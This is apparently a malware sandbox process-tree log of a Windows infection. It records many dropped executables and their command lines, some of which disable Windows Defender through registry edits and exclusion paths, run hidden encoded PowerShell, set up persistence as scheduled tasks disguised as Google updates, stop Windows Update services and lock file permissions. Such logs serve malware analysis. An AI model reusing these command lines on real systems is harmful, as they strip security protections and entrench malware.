  - - C:\Users\Admin\Pictures\Wn1eGXZNvagjG0sfJOA46FhO.exe
      "C:\Users\Admin\Pictures\Wn1eGXZNvagjG0sfJOA46FhO.exe"
      4⤵
      PID:7536
  - - C:\Users\Admin\Pictures\2mJ7V2XqTNxDj59yjeOxydnY.exe
      "C:\Users\Admin\Pictures\2mJ7V2XqTNxDj59yjeOxydnY.exe"
      4⤵
      PID:7676
    - - C:\Users\Admin\AppData\Local\Temp\7zS94A.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:3764
      - C:\Users\Admin\AppData\Local\Temp\7zS3C31.tmp\Install.exe
        
        .\Install.exe /adidL "385118" /S
        6⤵
        
        PID:7548
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:8588
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:7796
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:6836
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:8360
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gGiaXDDpr" /SC once /ST 05:08:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:1920
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gGiaXDDpr"
        7⤵
        
        PID:8952
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gGiaXDDpr"
        7⤵
        
        PID:4744
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bsxbnVOyALBYOoKnMh" /SC once /ST 16:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\YLCInEF.exe\" pg /ghsite_idMPo 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:8368
  - - C:\Users\Admin\Pictures\Hnr9kqhjQVfVSgAWpN8bBBwx.exe
      "C:\Users\Admin\Pictures\Hnr9kqhjQVfVSgAWpN8bBBwx.exe"
      4⤵
      PID:7196
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Hnr9kqhjQVfVSgAWpN8bBBwx.exe" & exit
        5⤵
        
        PID:4172
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7196 -s 1960
        5⤵
        Program crash
        
        PID:8280
  - - C:\Users\Admin\Pictures\1q0NLqfsZMksnCUbwrB26NgF.exe
      "C:\Users\Admin\Pictures\1q0NLqfsZMksnCUbwrB26NgF.exe"
      4⤵
      PID:4248
  - - C:\Users\Admin\Pictures\NdSCVALhISq5QM2H5gK8VHK1.exe
      "C:\Users\Admin\Pictures\NdSCVALhISq5QM2H5gK8VHK1.exe" --silent --allusers=0
      4⤵
      PID:3624
    - - C:\Users\Admin\Pictures\NdSCVALhISq5QM2H5gK8VHK1.exe
        
        C:\Users\Admin\Pictures\NdSCVALhISq5QM2H5gK8VHK1.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x30c,0x310,0x314,0x2e8,0x318,0x68eb5648,0x68eb5658,0x68eb5664
        5⤵
        
        PID:6908
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\NdSCVALhISq5QM2H5gK8VHK1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\NdSCVALhISq5QM2H5gK8VHK1.exe" --version
        5⤵
        
        PID:7820
  - - C:\Users\Admin\Pictures\VQ1EGDlIsXTEUNUihSqsbXgI.exe
      "C:\Users\Admin\Pictures\VQ1EGDlIsXTEUNUihSqsbXgI.exe"
      4⤵
      PID:7928
    - - C:\Users\Admin\Pictures\VQ1EGDlIsXTEUNUihSqsbXgI.exe
        
        "C:\Users\Admin\Pictures\VQ1EGDlIsXTEUNUihSqsbXgI.exe"
        5⤵
        
        PID:2016
- C:\Users\Admin\Desktop\a\arinzezx.exe
  "C:\Users\Admin\Desktop\a\arinzezx.exe"
  2⤵
  PID:4588
- - C:\Users\Admin\Desktop\a\arinzezx.exe
    "C:\Users\Admin\Desktop\a\arinzezx.exe"
    3⤵
    PID:1040
- - C:\Users\Admin\Desktop\a\arinzezx.exe
    "C:\Users\Admin\Desktop\a\arinzezx.exe"
    3⤵
    PID:6296
- C:\Users\Admin\Desktop\a\obizx.exe
  "C:\Users\Admin\Desktop\a\obizx.exe"
  2⤵
  PID:5748
- - C:\Users\Admin\Desktop\a\obizx.exe
    "C:\Users\Admin\Desktop\a\obizx.exe"
    3⤵
    PID:7568
- C:\Users\Admin\Desktop\a\PO.pdf.exe
  "C:\Users\Admin\Desktop\a\PO.pdf.exe"
  2⤵
  PID:4132
- C:\Users\Admin\Desktop\a\DH.exe
  "C:\Users\Admin\Desktop\a\DH.exe"
  2⤵
  PID:7980
- - C:\Users\Admin\Desktop\a\DH.exe
    "C:\Users\Admin\Desktop\a\DH.exe"
    3⤵
    PID:5716
- C:\Users\Admin\Desktop\a\raaa.exe
  "C:\Users\Admin\Desktop\a\raaa.exe"
  2⤵
  PID:8152
- - C:\Users\Admin\Desktop\a\raaa.exe
    "C:\Users\Admin\Desktop\a\raaa.exe"
    3⤵
    PID:2140
- - C:\Users\Admin\Desktop\a\raaa.exe
    "C:\Users\Admin\Desktop\a\raaa.exe"
    3⤵
    PID:2616
- - C:\Users\Admin\Desktop\a\raaa.exe
    "C:\Users\Admin\Desktop\a\raaa.exe"
    3⤵
    PID:8376
- - C:\Users\Admin\Desktop\a\raaa.exe
    "C:\Users\Admin\Desktop\a\raaa.exe"
    3⤵
    PID:7124
- - C:\Users\Admin\Desktop\a\raaa.exe
    "C:\Users\Admin\Desktop\a\raaa.exe"
    3⤵
    PID:8404
- C:\Users\Admin\Desktop\a\aao.exe
  "C:\Users\Admin\Desktop\a\aao.exe"
  2⤵
  PID:8168
- - C:\Users\Admin\Desktop\a\aao.exe
    "C:\Users\Admin\Desktop\a\aao.exe"
    3⤵
    PID:8524
- C:\Users\Admin\Desktop\a\owenzx.exe
  "C:\Users\Admin\Desktop\a\owenzx.exe"
  2⤵
  PID:4968
- - C:\Users\Admin\Desktop\a\owenzx.exe
    "C:\Users\Admin\Desktop\a\owenzx.exe"
    3⤵
    PID:7600
- C:\Users\Admin\Desktop\a\ghostzx.exe
  "C:\Users\Admin\Desktop\a\ghostzx.exe"
  2⤵
  PID:7404
- - C:\Users\Admin\Desktop\a\ghostzx.exe
    "C:\Users\Admin\Desktop\a\ghostzx.exe"
    3⤵
    PID:5532
- C:\Users\Admin\Desktop\a\isbinzx.exe
  "C:\Users\Admin\Desktop\a\isbinzx.exe"
  2⤵
  PID:7816
- - C:\Users\Admin\Desktop\a\isbinzx.exe
    "C:\Users\Admin\Desktop\a\isbinzx.exe"
    3⤵
    PID:7572
- - C:\Users\Admin\Desktop\a\isbinzx.exe
    "C:\Users\Admin\Desktop\a\isbinzx.exe"
    3⤵
    PID:8476
- C:\Users\Admin\Desktop\a\newrock.exe
  "C:\Users\Admin\Desktop\a\newrock.exe"
  2⤵
  PID:8572
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:5904
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:2224
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8572 -s 1460
    3⤵
    - Program crash
    PID:8980
- C:\Users\Admin\Desktop\a\pablozx.exe
  "C:\Users\Admin\Desktop\a\pablozx.exe"
  2⤵
  PID:9100
- - C:\Users\Admin\Desktop\a\pablozx.exe
    "C:\Users\Admin\Desktop\a\pablozx.exe"
    3⤵
    PID:8524
- - C:\Users\Admin\Desktop\a\pablozx.exe
    "C:\Users\Admin\Desktop\a\pablozx.exe"
    3⤵
    PID:3496
- C:\Users\Admin\Desktop\a\humblezx.exe
  "C:\Users\Admin\Desktop\a\humblezx.exe"
  2⤵
  PID:3836
- - C:\Users\Admin\Desktop\a\humblezx.exe
    "C:\Users\Admin\Desktop\a\humblezx.exe"
    3⤵
    PID:6720
- C:\Users\Admin\Desktop\a\source2.exe
  "C:\Users\Admin\Desktop\a\source2.exe"
  2⤵
  PID:7132
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:6692
- C:\Users\Admin\Desktop\a\laplas03.exe
  "C:\Users\Admin\Desktop\a\laplas03.exe"
  2⤵
  PID:6020
- C:\Users\Admin\Desktop\a\difficultspecificprores.exe
  "C:\Users\Admin\Desktop\a\difficultspecificprores.exe"
  2⤵
  PID:6248
- C:\Users\Admin\Desktop\a\rengad.exe
  "C:\Users\Admin\Desktop\a\rengad.exe"
  2⤵
  PID:9052
- C:\Users\Admin\Desktop\a\Olfumi.exe
  "C:\Users\Admin\Desktop\a\Olfumi.exe"
  2⤵
  PID:7784
- C:\Windows\SysWOW64\ipconfig.exe
  "C:\Windows\SysWOW64\ipconfig.exe"
  2⤵
  - Gathers network information
  PID:7256
- C:\Users\Admin\Desktop\a\carryspend.exe
  "C:\Users\Admin\Desktop\a\carryspend.exe"
  2⤵
  PID:3276
- - C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardlowestpro.exe
    C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardlowestpro.exe
    3⤵
    PID:8472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6048 -ip 6048
1⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZU8US5PM.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZU8US5PM.exe
1⤵
PID:6636
- C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\NA4FQ2qC.exe
  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\NA4FQ2qC.exe
  2⤵
  PID:6808
- - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uS5vE1aj.exe
    C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uS5vE1aj.exe
    3⤵
    PID:6988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
PID:7036

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\XN9cw1Hj.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\XN9cw1Hj.exe
1⤵
PID:7160
- C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZT14HQ9.exe
  C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZT14HQ9.exe
  2⤵
  PID:4652
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 544
      4⤵
      Program crash
      PID:6932
- C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2xb747Wp.exe
  C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2xb747Wp.exe
  2⤵
  PID:3184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3488 -ip 3488
1⤵
PID:1692

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\SysWOW64\ipconfig.exe"
1⤵
- Gathers network information
PID:6500
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Desktop\a\sbinzx.exe"
  2⤵
  PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5700 -ip 5700
1⤵
PID:5224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\491B.exe
C:\Users\Admin\AppData\Local\Temp\491B.exe
1⤵
PID:6000
- C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\ZU8US5PM.exe
  C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\ZU8US5PM.exe
  2⤵
  PID:3428
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\NA4FQ2qC.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\NA4FQ2qC.exe
    3⤵
    PID:580
  - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\uS5vE1aj.exe
      C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\uS5vE1aj.exe
      4⤵
      PID:3812
    - - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\XN9cw1Hj.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\XN9cw1Hj.exe
        5⤵
        
        PID:3360
      - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\2xb747Wp.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\2xb747Wp.exe
        6⤵
        
        PID:3052

C:\Users\Admin\AppData\Local\Temp\4C49.exe
C:\Users\Admin\AppData\Local\Temp\4C49.exe
1⤵
PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4FE4.bat" "
1⤵
PID:2696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
  2⤵
  PID:2764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb488c46f8,0x7ffb488c4708,0x7ffb488c4718
    3⤵
    PID:2960

C:\Users\Admin\AppData\Local\Temp\5F27.exe
C:\Users\Admin\AppData\Local\Temp\5F27.exe
1⤵
PID:3068
- C:\Windows\SysWOW64\typeperf.exe
  "C:\Windows\SysWOW64\typeperf.exe"
  2⤵
  PID:3608

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1ZT14HQ9.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1ZT14HQ9.exe
1⤵
PID:1032
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:6852
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 548
    3⤵
    - Program crash
    PID:3200

C:\Users\Admin\AppData\Local\Temp\6225.exe
C:\Users\Admin\AppData\Local\Temp\6225.exe
1⤵
PID:6176

C:\Users\Admin\AppData\Local\Temp\6553.exe
C:\Users\Admin\AppData\Local\Temp\6553.exe
1⤵
PID:3304
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  PID:7104
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    PID:5440
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:1068
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:6232
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:2088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5984
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:5732
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:7080
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    PID:4840

C:\Users\Admin\AppData\Local\Temp\6B11.exe
C:\Users\Admin\AppData\Local\Temp\6B11.exe
1⤵
PID:5000
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 788
  2⤵
  - Program crash
  PID:3268

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:1728
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5820
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2280
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6312
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5016
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:6616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6852 -ip 6852
1⤵
PID:3816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5000 -ip 5000
1⤵
PID:2632

C:\Users\Admin\AppData\Local\Temp\A3E5.exe
C:\Users\Admin\AppData\Local\Temp\A3E5.exe
1⤵
PID:652
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 812
  2⤵
  - Program crash
  PID:5272
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 812
  2⤵
  - Program crash
  PID:5932

C:\Users\Admin\AppData\Local\Temp\A7ED.exe
C:\Users\Admin\AppData\Local\Temp\A7ED.exe
1⤵
PID:6316

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
1⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\B27D.exe
C:\Users\Admin\AppData\Local\Temp\B27D.exe
1⤵
PID:6608
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:5320
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:6592
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 584
    3⤵
    - Program crash
    PID:6424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 652 -ip 652
1⤵
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5604 -ip 5604
1⤵
PID:4344

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4960
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:3172
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:1920
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:6288
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6160

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:7044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5472 -ip 5472
1⤵
PID:5860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5584 -ip 5584
1⤵
PID:6160

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
1⤵
PID:1760
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Desktop\a\sbin22zx.exe"
  2⤵
  PID:2696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6592 -ip 6592
1⤵
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1472 -ip 1472
1⤵
PID:696

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\tlxvacrdjkek.xml"
1⤵
- Creates scheduled task(s)
PID:4760

C:\Users\Admin\AppData\Local\Temp\425A.exe
C:\Users\Admin\AppData\Local\Temp\425A.exe
1⤵
PID:5632

C:\Windows\SysWOW64\wlanext.exe
"C:\Windows\SysWOW64\wlanext.exe"
1⤵
PID:6452
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Desktop\a\smss.exe"
  2⤵
  PID:984

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:1204

C:\Users\Admin\AppData\Local\Temp\4827.exe
C:\Users\Admin\AppData\Local\Temp\4827.exe
1⤵
PID:5056
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2024
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:6712
- - C:\Windows\SysWOW64\dialer.exe
    "C:\Windows\system32\dialer.exe"
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 412
    3⤵
    - Program crash
    PID:7376
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 320
  2⤵
  - Program crash
  PID:892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6752 -ip 6752
1⤵
PID:2496

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:2140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2976 -ip 2976
1⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\zGTXbDaaZIyYrGBFn\iDnfWbvbSnsqmHk\YObcqkr.exe
C:\Users\Admin\AppData\Local\Temp\zGTXbDaaZIyYrGBFn\iDnfWbvbSnsqmHk\YObcqkr.exe Q8 /dasite_idQuD 525403 /S
1⤵
PID:1780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 